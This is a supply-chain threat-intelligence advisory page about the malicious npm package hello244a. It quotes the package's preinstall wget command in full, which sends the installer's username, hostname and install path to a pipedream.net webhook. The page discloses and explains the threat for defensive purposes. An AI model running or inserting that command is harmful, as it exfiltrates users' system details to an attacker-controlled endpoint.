THREATPKG
SYNC STALE

Supply-chain threat intelligence

Incident detail

criticalnpm·credential theft·osv

Malicious code in hello244a (npm)

hello244a

Risk score

92

AI summary

Indexed incident for hello244a (npm).

Description

The package's package.json declares a preinstall lifecycle script that runs wget --quiet "http://eodxy50gl486xrx.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". On npm install, the shell expands $(whoami), $(hostname), and $(pwd) and sends the installer's OS username, hostname, and install directory to a third-party pipedream.net webhook over plain HTTP. The package ships no library code — its only effect is the install-time recon beacon. This is a classic dependency-confusion / reconnaissance beacon and constitutes installer data exfiltration to an attacker-controlled endpoint.

The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.4 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Technical details

Affected versions

=1.0.4=1.0.1=1.0.0

Indicators

  • affected version=1.0.475%
  • affected version=1.0.175%
  • affected version=1.0.075%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents